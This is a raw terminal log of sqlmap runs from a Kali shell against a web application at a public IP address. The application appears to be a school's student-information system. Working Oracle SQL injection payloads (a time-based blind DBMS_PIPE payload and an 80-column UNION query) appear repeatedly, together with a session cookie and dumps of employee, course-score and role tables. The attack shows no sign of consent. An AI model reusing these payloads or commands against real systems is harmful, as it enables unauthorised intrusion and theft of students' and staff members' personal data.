| EMPLOYEEID | DUTY | EMAIL | DEGREE | GENDER | BORNDATE | EMPLOYEENO | CONTACTINFO | CULTURELEVEL | EMPLOYEENAME | EMPLOYEEPHOTO | DEPARTMENTCODE | EMPLOYEENAME_EN | EMPLOYEETYPECODE |
+------------------------+------+-------+--------+--------+----------+------------+-------------+--------------+--------------+---------------+----------------+-----------------+------------------+
| 06103010060710294427A | NULL | NULL | ?? | NULL | 200309118 | NULL | NULL | ??? | NULL | 08 | NULL | NULL |
+------------------------+------+-------+--------+--------+----------+------------+-------------+--------------+--------------+---------------+----------------+-----------------+------------------+
[10:52:03] [INFO] table ‘XDGSNEW.BASE_EMPLOYEE160920‘ dumped to CSV file ‘/root/.sqlmap/output/202.201.33.73/dump/XDGSNEW/BASE_EMPLOYEE160920.csv‘
[10:52:03] [INFO] fetching columns for table ‘ST_COURSESCORE_140625QXK‘ in database ‘XDGSNEW‘
[10:52:03] [INFO] the SQL query used returns 27 entries
[10:52:04] [INFO] retrieved: "CREDITHOURNUM","NUMBER"
[10:52:04] [INFO] retrieved: "TEACHCLASSID","VARCHAR2"
[10:52:04] [INFO] retrieved: "EMPLOYEEID","VARCHAR2"
[10:52:05] [INFO] retrieved: "REMARK","VARCHAR2"
[10:52:05] [INFO] retrieved: "COURSENO","VARCHAR2"
[10:52:05] [INFO] retrieved: "COURSENAME","VARCHAR2"
[10:52:06] [INFO] retrieved: "COURSEDEPARTMENT","VARCHAR2"
[10:52:06] [INFO] retrieved: "STUDENTID","VARCHAR2"
[10:52:06] [INFO] retrieved: "COURSEID","VARCHAR2"
[10:52:07] [INFO] retrieved: "STUDYTIMES","NUMBER"
[10:52:07] [INFO] retrieved: "TERMID","VARCHAR2"
[10:52:07] [INFO] retrieved: "ISDEGREECOURSE","VARCHAR2"
[10:52:08] [INFO] retrieved: "SCORETYPEID","VARCHAR2"
[10:52:08] [INFO] retrieved: "DAILYSCORE","NUMBER"
[10:52:08] [INFO] retrieved: "EXAMSCORE","VARCHAR2"
[10:52:08] [INFO] retrieved: "SCORE100","NUMBER"
[10:52:09] [INFO] retrieved: "SCOREREMARK","VARCHAR2"
[10:52:09] [INFO] retrieved: "ACCOUNT","NUMBER"
[10:52:09] [INFO] retrieved: "GRADESTATUS","VARCHAR2"
[10:52:10] [INFO] retrieved: "INPUTACCOUNT","VARCHAR2"
[10:52:10] [INFO] retrieved: "INPUTDATE","DATE"
[10:52:10] [INFO] retrieved: "AUDITACCOUNT","VARCHAR2"
[10:52:10] [INFO] retrieved: "AUDITDATE","DATE"
[10:52:11] [INFO] retrieved: "LASTMODIFYDATE","DATE"
[10:52:11] [INFO] retrieved: "LASTMODIFYACCOUNT","VARCHAR2"
[10:52:11] [INFO] retrieved: "MODIFYHISTORY","VARCHAR2"
[10:52:12] [INFO] retrieved: "VOLUMENO","NUMBER"
[10:52:12] [INFO] fetching entries for table ‘ST_COURSESCORE_140625QXK‘ in database ‘XDGSNEW‘
[10:52:12] [INFO] fetching number of entries for table ‘ST_COURSESCORE_140625QXK‘ in database ‘XDGSNEW‘
[10:52:12] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
111972
[10:53:36] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
2
[10:54:10] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[10:54:59] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
06122122055410296204
[11:00:34] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
????
[11:12:34] [ERROR] invalid character detected. retrying..
??
[11:16:21] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
LS0
[11:18:25] [ERROR] invalid character detected. retrying..
[11:19:38] [ERROR] invalid character detected. retrying..
[11:20:02] [ERROR] invalid character detected. retrying..
[11:20:27] [ERROR] invalid character detected. retrying..
[11:20:49] [ERROR] invalid character detected. retrying..
0224$e
[11:23:06] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
2
[11:23:47] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
0
[11:24:40] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[11:25:24] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
92
[11:26:23] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
?
[11:31:16] [ERROR] invalid character detected. retrying..
[11:31:48] [ERROR] invalid character detected. retrying..
[11:32:23] [ERROR] invalid character detected. retrying..
?
[11:33:02] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
a00
[11:34:32] [ERROR] invalid character detected. retrying..
[11:34:46] [ERROR] invalid character detected. retrying..
1
[11:35:00] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[11:36:01] [ERROR] invalid character detected. retrying..
22-D^C
[11:37:31] [WARNING] Ctrl+C detected in dumping phase
Database: XDGSNEW
Table: ST_COURSESCORE_140625QXK
[1 entry]
+----------------------+------------+---------+-----------+-----------+-----------+-----------+------------+------------+-------------+--------------+--------------+---------------+------------------+
| COURSEID | EMPLOYEEID | ACCOUNT | COURSENO | AUDITDATE | INPUTDATE | EXAMSCORE | DAILYSCORE | COURSENAME | GRADESTATUS | AUDITACCOUNT | INPUTACCOUNT | CREDITHOURNUM | COURSEDEPARTMENT |
+----------------------+------------+---------+-----------+-----------+-----------+-----------+------------+------------+-------------+--------------+--------------+---------------+------------------+
| 06122122055410296204 | <blank> | 2 | LS00224$e | NULL | 92 | 0 | ?????? | ?? | NULL | a001 | 2 | NULL |
+----------------------+------------+---------+-----------+-----------+-----------+-----------+------------+------------+-------------+--------------+--------------+---------------+------------------+
[11:37:31] [INFO] table ‘XDGSNEW.ST_COURSESCORE_140625QXK‘ dumped to CSV file ‘/root/.sqlmap/output/202.201.33.73/dump/XDGSNEW/ST_COURSESCORE_140625QXK.csv‘
[11:37:31] [INFO] fetching columns for table ‘SYS_USERROLE_BAK‘ in database ‘XDGSNEW‘
[11:37:32] [INFO] the SQL query used returns 2 entries
[11:37:32] [INFO] retrieved: "ROLECODE","VARCHAR2"
[11:37:32] [INFO] retrieved: "USERACCOUNT","VARCHAR2"
[11:37:32] [INFO] fetching entries for table ‘SYS_USERROLE_BAK‘ in database ‘XDGSNEW‘
[11:37:32] [INFO] fetching number of entries for table ‘SYS_USERROLE_BAK‘ in database ‘XDGSNEW‘
[11:37:32] [WARNING] (case) time-based comparison requires larger statistical model, please wait........^C
[11:37:35] [ERROR] user aborted
[*] shutting down at 11:37:35
root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" -D MDSYS --dump
___
__H__
___ ___["]_____ ___ ___ {1.1.12#stable}
|_ -| . [)] | .‘| . |
|___|_ ["]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user‘s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:40:36
[11:40:39] [INFO] resuming back-end DBMS ‘oracle‘
[11:40:39] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=172085211005‘ AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND ‘IkNF‘=‘IkNF
Type: UNION query
Title: Generic UNION query (NULL) - 80 columns
Payload: id=-6239‘ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq
---
[11:40:39] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[11:40:39] [INFO] fetching tables for database: ‘MDSYS‘
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] y
[11:40:50] [INFO] the SQL query used returns 18 entries
[11:40:50] [INFO] retrieved: CS_SRS
[11:40:50] [INFO] retrieved: MD$RELATE
[11:40:50] [INFO] retrieved: OGIS_GEOMETRY_COLUMNS
[11:40:50] [INFO] retrieved: OGIS_SPATIAL_REFERENCE_SYSTEMS
[11:40:51] [INFO] retrieved: SDO_ANGLE_UNITS
[11:40:51] [INFO] retrieved: SDO_AREA_UNITS
[11:40:51] [INFO] retrieved: SDO_DATUMS
[11:40:51] [INFO] retrieved: SDO_DIST_UNITS
[11:40:51] [INFO] retrieved: SDO_ELLIPSOIDS
[11:40:51] [INFO] retrieved: SDO_GEOM_METADATA_TABLE
[11:40:51] [INFO] retrieved: SDO_INDEX_METADATA_TABLE
[11:40:51] [INFO] retrieved: SDO_LRS_METADATA_TABLE
[11:40:51] [INFO] retrieved: SDO_MAPS_TABLE
[11:40:51] [INFO] retrieved: SDO_PROJECTIONS
[11:40:51] [INFO] retrieved: SDO_STYLES_TABLE
[11:40:51] [INFO] retrieved: SDO_THEMES_TABLE
[11:40:51] [INFO] retrieved: USER_CS_SRS
[11:40:51] [INFO] retrieved: USER_TRANSFORM_MAP
[11:40:51] [INFO] fetching columns for table ‘SDO_MAPS_TABLE‘ in database ‘MDSYS‘
[11:40:52] [INFO] the SQL query used returns 4 entries
[11:40:52] [INFO] retrieved: "SDO_OWNER","VARCHAR2"
[11:40:52] [INFO] retrieved: "NAME","VARCHAR2"
[11:40:52] [INFO] retrieved: "DESCRIPTION","VARCHAR2"
[11:40:53] [INFO] retrieved: "DEFINITION","CLOB"
[11:40:53] [INFO] fetching entries for table ‘SDO_MAPS_TABLE‘ in database ‘MDSYS‘
[11:40:53] [INFO] fetching number of entries for table ‘SDO_MAPS_TABLE‘ in database ‘MDSYS‘
[11:40:53] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[11:41:02] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
0
[11:41:27] [WARNING] table ‘SDO_MAPS_TABLE‘ in database ‘MDSYS‘ appears to be empty
Database: MDSYS
Table: SDO_MAPS_TABLE
[0 entries]
+------+-----------+------------+-------------+
| NAME | SDO_OWNER | DEFINITION | DESCRIPTION |
+------+-----------+------------+-------------+
+------+-----------+------------+-------------+
[11:41:27] [INFO] table ‘MDSYS.SDO_MAPS_TABLE‘ dumped to CSV file ‘/root/.sqlmap/output/202.201.33.73/dump/MDSYS/SDO_MAPS_TABLE.csv‘
[11:41:27] [INFO] fetching columns for table ‘CS_SRS‘ in database ‘MDSYS‘
[11:41:27] [INFO] the SQL query used returns 6 entries
[11:41:28] [INFO] retrieved: "CS_NAME","VARCHAR2"
[11:41:28] [INFO] retrieved: "SRID","NUMBER"
[11:41:28] [INFO] retrieved: "AUTH_SRID","NUMBER"
[11:41:28] [INFO] retrieved: "AUTH_NAME","VARCHAR2"
[11:41:29] [INFO] retrieved: "WKTEXT","VARCHAR2"
[11:41:29] [INFO] retrieved: "CS_BOUNDS","SDO_GEOMETRY"
[11:41:29] [INFO] fetching entries for table ‘CS_SRS‘ in database ‘MDSYS‘
[11:41:29] [INFO] the SQL query used returns 1000 entries
^C
[11:43:30] [WARNING] user aborted during enumeration. sqlmap will display partial output
[11:43:30] [INFO] fetching number of entries for table ‘CS_SRS‘ in database ‘MDSYS‘
[11:43:30] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
^C
[11:43:41] [ERROR] user aborted
[*] shutting down at 11:43:41
root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" -D MDSYS -T SDO_MAPS_TABLE
___
__H__
___ ___["]_____ ___ ___ {1.1.12#stable}
|_ -| . ["] | .‘| . |
|___|_ [.]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user‘s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:44:17
[11:44:19] [INFO] resuming back-end DBMS ‘oracle‘
[11:44:19] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=172085211005‘ AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND ‘IkNF‘=‘IkNF
Type: UNION query
Title: Generic UNION query (NULL) - 80 columns
Payload: id=-6239‘ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq
---
[11:44:19] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[11:44:19] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/202.201.33.73‘
[*] shutting down at 11:44:19
root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" -D MDSYS -C clo
___
__H__
___ ___[,]_____ ___ ___ {1.1.12#stable}
|_ -| . [(] | .‘| . |
|___|_ [,]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user‘s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:44:53
[11:44:53] [INFO] resuming back-end DBMS ‘oracle‘
[11:44:53] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=172085211005‘ AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND ‘IkNF‘=‘IkNF
Type: UNION query
Title: Generic UNION query (NULL) - 80 columns
Payload: id=-6239‘ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq
---
[11:44:54] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[11:44:54] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/202.201.33.73‘
[*] shutting down at 11:44:54
root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" -D MDSYS -C name
___
__H__
___ ___[.]_____ ___ ___ {1.1.12#stable}
|_ -| . [)] | .‘| . |
|___|_ ["]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user‘s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:45:05
[11:45:05] [INFO] resuming back-end DBMS ‘oracle‘
[11:45:05] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=172085211005‘ AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND ‘IkNF‘=‘IkNF
Type: UNION query
Title: Generic UNION query (NULL) - 80 columns
Payload: id=-6239‘ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq
---
[11:45:06] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[11:45:06] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/202.201.33.73‘
[*] shutting down at 11:45:06
root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" -D MDSYS --dump
___
__H__
___ ___["]_____ ___ ___ {1.1.12#stable}
|_ -| . ["] | .‘| . |
|___|_ [‘]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user‘s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:45:23
[11:45:24] [INFO] resuming back-end DBMS ‘oracle‘
[11:45:24] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=172085211005‘ AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND ‘IkNF‘=‘IkNF
Type: UNION query
Title: Generic UNION query (NULL) - 80 columns
Payload: id=-6239‘ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq
---
[11:45:24] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[11:45:24] [INFO] fetching tables for database: ‘MDSYS‘
[11:45:24] [INFO] the SQL query used returns 18 entries
[11:45:24] [INFO] resumed: CS_SRS
[11:45:24] [INFO] resumed: MD$RELATE
[11:45:24] [INFO] resumed: OGIS_GEOMETRY_COLUMNS
[11:45:24] [INFO] resumed: OGIS_SPATIAL_REFERENCE_SYSTEMS
[11:45:24] [INFO] resumed: SDO_ANGLE_UNITS
[11:45:24] [INFO] resumed: SDO_AREA_UNITS
[11:45:24] [INFO] resumed: SDO_DATUMS
[11:45:24] [INFO] resumed: SDO_DIST_UNITS
[11:45:24] [INFO] resumed: SDO_ELLIPSOIDS
[11:45:24] [INFO] resumed: SDO_GEOM_METADATA_TABLE
[11:45:24] [INFO] resumed: SDO_INDEX_METADATA_TABLE
[11:45:24] [INFO] resumed: SDO_LRS_METADATA_TABLE
[11:45:24] [INFO] resumed: SDO_MAPS_TABLE
[11:45:24] [INFO] resumed: SDO_PROJECTIONS
[11:45:24] [INFO] resumed: SDO_STYLES_TABLE
[11:45:24] [INFO] resumed: SDO_THEMES_TABLE
[11:45:24] [INFO] resumed: USER_CS_SRS
[11:45:24] [INFO] resumed: USER_TRANSFORM_MAP
[11:45:24] [INFO] fetching columns for table ‘SDO_MAPS_TABLE‘ in database ‘MDSYS‘
[11:45:24] [INFO] the SQL query used returns 4 entries
[11:45:24] [INFO] resumed: "SDO_OWNER","VARCHAR2"
[11:45:24] [INFO] resumed: "NAME","VARCHAR2"
[11:45:24] [INFO] resumed: "DESCRIPTION","VARCHAR2"
[11:45:24] [INFO] resumed: "DEFINITION","CLOB"
[11:45:24] [INFO] fetching entries for table ‘SDO_MAPS_TABLE‘ in database ‘MDSYS‘
[11:45:24] [INFO] fetching number of entries for table ‘SDO_MAPS_TABLE‘ in database ‘MDSYS‘
[11:45:24] [INFO] resumed: 0
[11:45:24] [WARNING] table ‘SDO_MAPS_TABLE‘ in database ‘MDSYS‘ appears to be empty
Database: MDSYS
Table: SDO_MAPS_TABLE
[0 entries]
+------+-----------+------------+-------------+
| NAME | SDO_OWNER | DEFINITION | DESCRIPTION |
+------+-----------+------------+-------------+
+------+-----------+------------+-------------+
[11:45:24] [INFO] table ‘MDSYS.SDO_MAPS_TABLE‘ dumped to CSV file ‘/root/.sqlmap/output/202.201.33.73/dump/MDSYS/SDO_MAPS_TABLE.csv‘
[11:45:24] [INFO] fetching columns for table ‘CS_SRS‘ in database ‘MDSYS‘
[11:45:24] [INFO] the SQL query used returns 6 entries
[11:45:24] [INFO] resumed: "CS_NAME","VARCHAR2"
[11:45:24] [INFO] resumed: "SRID","NUMBER"
[11:45:24] [INFO] resumed: "AUTH_SRID","NUMBER"
[11:45:24] [INFO] resumed: "AUTH_NAME","VARCHAR2"
[11:45:24] [INFO] resumed: "WKTEXT","VARCHAR2"
[11:45:24] [INFO] resumed: "CS_BOUNDS","SDO_GEOMETRY"
[11:45:24] [INFO] fetching entries for table ‘CS_SRS‘ in database ‘MDSYS‘
[11:45:24] [INFO] the SQL query used returns 1000 entries
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] n
^C
[11:45:40] [WARNING] user aborted during enumeration. sqlmap will display partial output
[11:45:40] [INFO] fetching number of entries for table ‘CS_SRS‘ in database ‘MDSYS‘
[11:45:40] [WARNING] (case) time-based comparison requires larger statistical model, please wait.....^C
[11:45:42] [ERROR] user aborted
[*] shutting down at 11:45:42
root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" -D MDSYS --dump
___
__H__
___ ___[‘]_____ ___ ___ {1.1.12#stable}
|_ -| . ["] | .‘| . |
|___|_ [,]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user‘s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:45:46
[11:45:47] [INFO] resuming back-end DBMS ‘oracle‘
[11:45:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=172085211005‘ AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND ‘IkNF‘=‘IkNF
Type: UNION query
Title: Generic UNION query (NULL) - 80 columns
Payload: id=-6239‘ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq
---
[11:45:47] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[11:45:47] [INFO] fetching tables for database: ‘MDSYS‘
[11:45:47] [INFO] the SQL query used returns 18 entries
[11:45:47] [INFO] resumed: CS_SRS
[11:45:47] [INFO] resumed: MD$RELATE
[11:45:47] [INFO] resumed: OGIS_GEOMETRY_COLUMNS
[11:45:47] [INFO] resumed: OGIS_SPATIAL_REFERENCE_SYSTEMS
